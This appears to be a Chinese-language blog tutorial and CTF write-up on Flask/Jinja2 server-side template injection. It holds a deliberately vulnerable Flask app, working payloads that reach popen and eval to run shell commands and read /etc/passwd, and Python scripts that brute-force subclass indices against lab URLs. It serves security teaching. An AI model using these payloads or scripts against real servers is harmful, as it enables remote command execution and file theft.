SSTI模板注入

简介: SSTI模板注入

1、原理简述

flask是使用Jinja2来作为渲染引擎的,网站根目录下的templates文件夹是用来存放html文件,即模板文件。flask的渲染方法有render_template和render_template_string两种,render_template()是用来渲染一个指定的文件的,render_template_string则是用来渲染一个字符串的,不正确的使用flask中的render_template_string方法会引发SSTI。

from flask import Flask,request,render_template_string
app = Flask(__name__)
@app.route('/test')
def index():
    str = request.args.get('myon')
    html_str ='''
    <html>
    <head></head>
    <body>{{str}}</body>
    </html>
    '''
    return render_template_string(html_str,str = str)
if __name__ == '__main__':
    app.debug = True
    app.run()

上面代码将传入的字符串直接当成字符串去传递给html_str代码,不会解析

而当我们将代码改为

from flask import Flask,request,render_template_string
app = Flask(__name__)
@app.route('/test')
def index():
    strinput = request.args.get('myon')
    html_str ='''
    <html>
    <head></head>
    <body>{}</body>
    </html>
    '''.format(strinput)
    return render_template_string(html_str)
if __name__ == '__main__':
    app.debug = True
    app.run()

这里我们可以控制输入,这是直接进行渲染,并且会进行解析

比如我们传入?myon={{7*7}}便会得到49的回显,说明被执行了

{{}}是变量包裹标识符,不仅可以传递变量,还可以执行一些简单的表达式

2、常用payload及相关脚本

首先进行一个简单判断,确实存在SSTI

(1)''.__class__    

         //读取当前类

(2)''.__class__.__base__  

         //读取当前类的父类

(3)''.__class__.__base__.__subclasses__()  

          //读取object下的所有子类

(4)''.__class__.__base__.__subclasses__()[xx]  

         //选择其中的一个子类

(5)''.__class__.__base__.__subclasses__()[xx].__init__.__globals__

         //初始化并加载该类下的可用函数

(6)函数调用

注意:至于为什么用的是79,117,64,看完(7)就明白了

① 子类可以直接调用的函数

比如文件读取<class '_frozen_importlib_external.FileLoader'>类下的get_data函数


''.__class__.__base__.__subclasses__()[79]["get_data"](0,"/etc/passwd")

重载函数

比如危险函数popen

''.__class__.__base__.__subclasses__()[117].__init__.__globals__['popen']('ls').read()

//不加read()返回的是地址

加上read()

③ 内嵌函数

先使用__builtins__加载内嵌函数,再调用内嵌函数

''.__class__.__base__.__subclasses__()[64].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('ls').read()")


//eval()里面就可以写python代码

''.__class__.__base__.__subclasses__()[64].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('whoami').read()")

''.__class__.__base__.__subclasses__()[64].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('id').read()")

(7)常用脚本

注意:针对题目有无参数以及传参方式的不同我们需要写不同的脚本

① 找类的位置

import html
import requests
url='http://1.14.110.159:18080/flasklab/level/1'   //替换成题目的url
def find_class_num():
    for i in range(500):
        parm_name='code'
        parm_value = "{{''.__class__.__base__.__subclasses__()[" + str(i) +"]}}"
        data = {parm_name:parm_value}
        print(data)
        re = requests.post(url,data=data).text  //本题是只允许post传参
        htmltest =html.unescape(re)
        print(htmltest)
        if '_frozen_importlib_external.FileLoader' in re:  //替换成你想查找的类
            print(i)
            return i
find_class_num()  //如果存在这个类,则会输出该类所在位置

跑完之后我们发现存在_frozen_importlib_external.FileLoader这个类,且位置是[79]

接下来便可调用该类下的get_data函数去进行文件读取【参考 (6)①】

② 找危险函数eval、popen位置

import html
import requests
url='http://1.14.110.159:18080/flasklab/level/1'   //替换成题目的url
def find_eval():
    for i in range(500):
        parm_name='code'
        parm_value = "{{''.__class__.__base__.__subclasses__()[" + str(i) +"].__init__.__globals__['__builtins__']}}"
        data = {parm_name:parm_value}
        print(data)
        re = requests.post(url,data=data).text //这里也是post传参
        htmltest =html.unescape(re)
        # print(htmltest) //只找函数位置,若想看详细回显则可以取消注释
        if 'popen' in re:
            print(i)
            return i
find_eval()

跑出来发现位置为[64],接下来我们便可利用内嵌函数eval 进行命令执行【参考(6)③】

这个脚本同样适用于找popen函数,有一点小修改

因为popen是重载函数,所以要去掉用于加载内嵌函数的__builtins__

其实也不一定,可以加上和去掉都试试,因为具体情况还是取决于题目给的环境)

import html
import requests
url='http://1.14.110.159:18080/flasklab/level/1'   //替换成题目的url
def find_popen():
    for i in range(500):
        parm_name='code'
        parm_value = "{{''.__class__.__base__.__subclasses__()[" + str(i) +"].__init__.__globals__}}"  //popen是重载函数,所以要去掉用于加载内嵌函数的__builtins__
        data = {parm_name:parm_value}
        print(data)
        re = requests.post(url,data=data).text
        htmltest =html.unescape(re)
        #print(htmltest)
        if 'popen' in re: //修改查找的函数名
            print(i)
            return i
find_popen()

发现也存在,位置是[117],用法参考【(6)②】

准确来说我们是先找popen函数,没找到再去找eval函数

如果globals下面没有可以直接利用的重载函数,就加载内嵌函数,使用内嵌函数来命令执行。

(8)比较通用的脚本

各位可以自己测试和修改

import html
import requests
url=''
parm_name=''
def find_class_num(class_name):
    for i in range(500):
        parm_value = "{{''.__class__.__base__.__subclasses__()[" + str(i) +"]}}"
        data = {parm_name:parm_value}
        re = requests.post(url,data=data).text
        htmltest =html.unescape(re)
        print(htmltest)
        if class_name in re:
            print(f"{class_name}所在的位置:",i)
            return i
def find_eval(func):
    for i in range(0,500):
        parm_value = "{{''.__class__.__base__.__subclasses__()[" + str(i) +"].__init__.__globals__['__builtins__']}}"
        data = {parm_name:parm_value}
        # print(data)
        print(f"正在查找第{i}个类下的{func}")
        re = requests.post(url,data=data).text
        htmltest =html.unescape(re)
        # print(htmltest)
        if func in re:
            print(i)
            print(f"find,利用:{parm_value}")
            return i
if __name__ == '__main__':
    print("请求方式是post,get方式请更改函数里面的请求参数。")
    url = input("输入URL:")
    parm_name = input("输入参数:")
    choice=eval(input("操作:1,查找类,2,查找内嵌函数:"))
    if choice==1:
        class_name = input("输入查找类:")
        find_class_num(class_name)
    if choice ==2:
        func = input("输入查找的函数:")
        find_eval(func)

(9)__mro__[xx]

这个也是用来读取父类,和__base__类似,因为有时候base会被过滤掉,我们就可以用这个,


里面的xx表示你要读取它的上几级,比如__mro__[1]就相当于__base__ 都是读取上一级类型,


但xx不一定为1,可以往上读取很多级,只要它存在更高级别的父类就可以。


比如:


使用base查找发现不对

换用mro,便可以找到(前提是这个object父类存在)

3、实战:攻防世界 Web_python_template_injection

eval、popen、import这些函数都可以跑,有时候在重载,有时候在内嵌,最好都试试

这道题是不支持post传参,这里我们编写get传参的脚本

import html
import requests
url='http://61.147.171.105:59139/'
def find_class_num():
    for i in range(0,500):
        # parm_value = "{{''.__class__.__mro__[2].__subclasses__()[" + str(i) +"]}}" //跑类位置
        parm_value ="{{''.__class__.__mro__[2].__subclasses__()[" + str(i) +"].__init__.__globals__['__builtins__']}}"  //跑函数位置
        # data = {url+parm_value}
        # print(data)
        print(url+parm_value)
        re = requests.get(url=url+parm_value).text
        # print(re)
        # print(htmltest)
        if 'eval' in re:
            print(i)
            return i
find_class_num()

跑出eval函数位置在[58]

直接上前面讲过的与eval函数有关的payload,并修改位置即可

所以payload为:

{{''.__class__.__base__.__subclasses__()[64].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('ls').read()")}}

发现fl4g,直接调用cat命令:

{{''.__class__.__base__.__subclasses__()[64].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('cat fl4g').read()")}}

拿到 ctf{f22b6844-5169-4054-b2a0-d95b9361cb57}

后面会继续介绍SSTI模板注入的常见绕过,谢谢关注与支持!

目录
相关文章
|
8月前
|
前端开发 Python
模板继承
模板继承。
32 1
|
8月前
|
XML 安全 数据库
24、显错注入(updatexml和extractvalue)
24、显错注入(updatexml和extractvalue)
67 0
|
3月前
|
SQL 安全 关系型数据库
beescms注入
通过 SQL 注入、弱口令爆破和文件上传三种方式对系统进行安全测试的过程。首先,通过手动注入和报错注入获取数据库信息,接着利用弱口令爆破工具尝试登录,最后通过修改 MIME 类型绕过文件上传限制,成功获取 shell。
beescms注入
|
8月前
|
Java 微服务
|
8月前
|
数据库
报错注入
报错注入
43 1
|
图形学
Unity构造器注入+配置文件小实例
Unity构造器注入+配置文件小实例
|
8月前
|
数据库
13、报错注入(Get)
13、报错注入(Get)
36 0
|
开发框架 缓存 安全
FreeMarker模板注入
FreeMarker模板注入
|
XML Java 数据格式
SpringXML实现注入
SpringXML实现注入
SpringXML实现注入
|
SQL 数据库
注入流程
注入流程
124 0

热门文章

最新文章

下一篇
开通oss服务